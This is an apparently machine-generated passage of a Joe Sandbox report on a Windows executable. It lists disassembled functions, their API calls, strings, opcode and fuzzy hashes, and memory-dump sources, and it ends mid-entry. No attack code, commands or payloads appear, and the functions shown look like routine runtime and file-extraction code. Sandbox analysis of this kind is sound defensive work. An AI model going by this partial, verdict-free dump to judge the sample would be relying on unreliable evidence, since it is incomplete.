                                        • Opcode ID: 2987d1c8d898471122b0bd08f3a6cc236d77137d4eca79105d48b9a2a354307f
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: 2987d1c8d898471122b0bd08f3a6cc236d77137d4eca79105d48b9a2a354307f
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        Function 00294CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a0cbb471fae97db129ce221ab2f4c279e4b27b39dadb0f5f351f22b2b89ec7e7
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: a0cbb471fae97db129ce221ab2f4c279e4b27b39dadb0f5f351f22b2b89ec7e7
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        Function 00294CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294C90
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 78edab25e7ed0c13caa2c8e010bf058b1d026008a4e50a59828573e8011d24a7
                                        • Instruction ID: 8b227b28977e6db61d3d67b1510e67926bf5dffe581e86d9b7edfb46a0028635
                                        • Opcode Fuzzy Hash: 78edab25e7ed0c13caa2c8e010bf058b1d026008a4e50a59828573e8011d24a7
                                        • Instruction Fuzzy Hash: C7A002D62BE117FC390872516E07C7B021DC4C6FA23328A1FF812D5AD2A8C01DB71431
                                        Function 00294D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294CF1
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 191df4e3268436fa98338447837b17308c401ce5ceff2af9118407352b3bf567
                                        • Instruction ID: 43fb352d493586b75684e55a503103ff82978981424b35710b1d88d089e57fd1
                                        • Opcode Fuzzy Hash: 191df4e3268436fa98338447837b17308c401ce5ceff2af9118407352b3bf567
                                        • Instruction Fuzzy Hash: 10A0019A2BE513BC3A0872616E06C7B021DD4D6BA23318A1AF802C5582A9811DAA1431
                                        Function 00271DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetDlgItemTextW.USER32(?,?,?), ref: 00271DFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemText
                                        • String ID:
                                        • API String ID: 3367045223-0
                                        • Opcode ID: c231d5a8f14eef96c4f434cd1df85e485685c6dc047c26db3e774848381ebec4
                                        • Instruction ID: ce9fbe84e4611742771707c3f10a9faf5aaeba25b1b3011ef8517d35b3166d4f
                                        • Opcode Fuzzy Hash: c231d5a8f14eef96c4f434cd1df85e485685c6dc047c26db3e774848381ebec4
                                        • Instruction Fuzzy Hash: 32C00231518200FFCB05CF58E948E1ABBBAFF96311B51C558F06886030C371D920DF62
                                        Function 0027E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,0027D115,?,?,?,?,?,?,?), ref: 0027E8DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: 4b330638608d944c369b0f65239022981d548edda6a849393921abf9cd439c8a
                                        • Instruction ID: 53840edd56892a7e550fa6ffa331ea7859ef15a2d432728472cc898667245527
                                        • Opcode Fuzzy Hash: 4b330638608d944c369b0f65239022981d548edda6a849393921abf9cd439c8a
                                        • Instruction Fuzzy Hash: EEA00230201109CBDB411F31EE0D70E7B6ABF426D9729C0A8A409C9071DF27CCA3EA41
                                        Function 0027DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNELBASE(?,?,00000001,0027DE10,D946AC94,?,00000000,002A93B1,000000FF,?,0027BEA6,?), ref: 0027DE6B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 84052aead9291677ad511e7c210355793fa3305971d920cb23b8f7599ad7f995
                                        • Instruction ID: f7db0061d22735b639a83e38fa9e3a1759288614ed8facc7e35b8921a4e99354
                                        • Opcode Fuzzy Hash: 84052aead9291677ad511e7c210355793fa3305971d920cb23b8f7599ad7f995
                                        • Instruction Fuzzy Hash: D8F08270461B039BD7359E24D414392B6F46F21334F04CB1DD1EA465E4C770A9A99A51

                                        Non-executed Functions

                                        Function 00279B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00279CB1
                                          • Part of subcall function 0027AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0027AC2E
                                          • Part of subcall function 0027AC11: GetLastError.KERNEL32 ref: 0027AC72
                                          • Part of subcall function 0027AC11: CloseHandle.KERNEL32(?), ref: 0027AC81
                                          • Part of subcall function 00272F45: _wcslen.LIBCMT ref: 00272F50
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00279EE1
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 00279F1E
                                        • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0027A0BF
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0027A127
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A134
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A14A
                                        • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A18E
                                        • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A196
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3517300771-3508440684
                                        • Opcode ID: 1ba37ee0820ebb9a2ac0ee5d5374260c1a6beaaf3321ad808f6da360a04e84f8
                                        • Instruction ID: 16c311f833b66b1efacc4708dcb2c4bd7cf254afc3e612928a0e3de5593fc904
                                        • Opcode Fuzzy Hash: 1ba37ee0820ebb9a2ac0ee5d5374260c1a6beaaf3321ad808f6da360a04e84f8
                                        • Instruction Fuzzy Hash: 173280719203899FDF24DFA8CC85BEE77B8AF19310F108159E94DE7281DB349A58CB61
                                        Function 00291630 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 275windowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0029163A
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002916BB
                                        • EndDialog.USER32(?,00000006), ref: 002916CE
                                        • GetDlgItem.USER32(?,0000006C), ref: 002916EA
                                        • SetFocus.USER32(00000000), ref: 002916F1
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 00271DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00271DFC
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00291763
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00291783
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00291826
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002918AD
                                          • Part of subcall function 00271150: _wcslen.LIBCMT ref: 0027115B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                        • String ID: %s %s$REPLACEFILEDLG
                                        • API String ID: 485132379-439456425
                                        • Opcode ID: 0e4ea5a1a34d7b0e8c2c555c3a2d1e4ffc19711fde9f9e2baffff55d73f52e1b
                                        • Instruction ID: 0ced29d00111c20e5a039f9da855c6fcf01719c753cf3794435d2036b521d2f0
                                        • Opcode Fuzzy Hash: 0e4ea5a1a34d7b0e8c2c555c3a2d1e4ffc19711fde9f9e2baffff55d73f52e1b
                                        • Instruction Fuzzy Hash: DFA18E71921219ABEF25EBA4CD4AFEEB77DAF05300F0081D5B209A6182DA715F74CF61
                                        Function 002A480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 9f3005e02fa71b01a5a4d24eb47663b08d634ad39129fd4693ea8ef0646f8fc7
                                        • Instruction ID: 8f45cd37a03ed71a457df27f104f19bbf48162bc2aef988cb9b6ef7f92c16c42
                                        • Opcode Fuzzy Hash: 9f3005e02fa71b01a5a4d24eb47663b08d634ad39129fd4693ea8ef0646f8fc7
                                        • Instruction Fuzzy Hash: 81C25E71E246298FDF25DE28DD407EAB3B5EB85305F1441EAD80DE7241EB74AE918F40
                                        Function 00273D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT ref: 0027438C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00274523
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 2172594012-2756464174
                                        • Opcode ID: 7b377515b5220640bd8cafb5b6344231114e5082db6caaec40023d126e41d1e1
                                        • Instruction ID: 0ab4673d537117d98c5d35f230eba56dff323b41acf8d6da2ef64dfee67f161b
                                        • Opcode Fuzzy Hash: 7b377515b5220640bd8cafb5b6344231114e5082db6caaec40023d126e41d1e1
                                        • Instruction Fuzzy Hash: AD72F471A203458FCF18EF68C8957EA7BA4BF15300F08857DEC5A9B282DB749964CF61
                                        Function 00296878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00296884
                                        • IsDebuggerPresent.KERNEL32 ref: 00296950
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00296970
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0029697A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: fe3e657dc92d24025a8f20dc2a3e5e412b24ecd003c6c1740fb19d9a18e10070
                                        • Instruction ID: aecb83d45ead61ac6b48e372bdc7c0f969d85b660955ba327b77a286d5e02097
                                        • Opcode Fuzzy Hash: fe3e657dc92d24025a8f20dc2a3e5e412b24ecd003c6c1740fb19d9a18e10070
                                        • Instruction Fuzzy Hash: 943114B5D553199BDF21DFA4D989BCCBBF8BF08300F1040AAE40CAB250EB719A848F44
                                        Function 0027932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0027952D,?,00000040,0027931E,00000001,?,?,?,?,0000001C,00287618,002BE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00279330
                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0027952D,?,00000040,0027931E,00000001,?,?), ref: 00279351
                                        • _wcslen.LIBCMT ref: 00279360
                                        • LocalFree.KERNEL32(00000000,00000000,00000000,002BE0C8,?,?,0027952D,?,00000040,0027931E,00000001,?,?,?,?,0000001C), ref: 00279373
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                        • String ID:
                                        • API String ID: 991192900-0
                                        • Opcode ID: 456838714ccd68fd3104578fd95a03466b8d3388c986feeebc512bc3c1158438
                                        • Instruction ID: 02d3b78b260e69cca2819ae4d426417d503dc850a1322316bfbad5dde653ff3b
                                        • Opcode Fuzzy Hash: 456838714ccd68fd3104578fd95a03466b8d3388c986feeebc512bc3c1158438
                                        • Instruction Fuzzy Hash: 92F08275520205FBEB049BA19D05EFF77BCAF86750B208059F506A6190CE709E119A74
                                        Function 00294E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,00294D59,0000001C,00294F4E,00000000,?,?,?,?,?,?,?,00294D59,00000004,002C5D84,00294FDE), ref: 00294E25
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00294D59,00000004,002C5D84,00294FDE), ref: 00294E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 03d70fa99e3d184e8ad2d45f49573b1d164783514c6c2dc9b9f9beab42fdc0a6
                                        • Instruction ID: d293d1490bb931c54f30cccfa25a78bab184adc5b474e47706cc388cda20e18d
                                        • Opcode Fuzzy Hash: 03d70fa99e3d184e8ad2d45f49573b1d164783514c6c2dc9b9f9beab42fdc0a6
                                        • Instruction Fuzzy Hash: E401F732B101096BCF14EE29DC05FEE7BA9AFC4328F0CC125EE59DB254DB34D8128680
                                        Function 0029AAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0029535E), ref: 0029ABBC
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0029535E), ref: 0029ABC6
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0029535E), ref: 0029ABD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: c49d0f90227ae5ae537f52a45c31fe0291edc062dc532321073d32079da1b0b1
                                        • Instruction ID: 45c1d073d52f6c89d1508ec9cc266f5be695cc49ca2b7d06551da406566c0a7b
                                        • Opcode Fuzzy Hash: c49d0f90227ae5ae537f52a45c31fe0291edc062dc532321073d32079da1b0b1
                                        • Instruction Fuzzy Hash: 9631D2749112299BCF21DF64D9887DCBBB8BF08310F5041EAE81CA7261EB709F918F45
                                        Function 002A4360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                        • Instruction ID: fb938721494f8706a8277966ab3d72ed9fbe82a0df0acf3ba97d143fa5263a3d
                                        • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                        • Instruction Fuzzy Hash: B8024C71E102199BDF14DFA9C8806ADF7F5EF89314F25426AD919E7340DB70AE518B80
                                        Function 0028FD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028FD6A
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,002B9714,?,?), ref: 0028FDB3
                                        Memory Dump Source
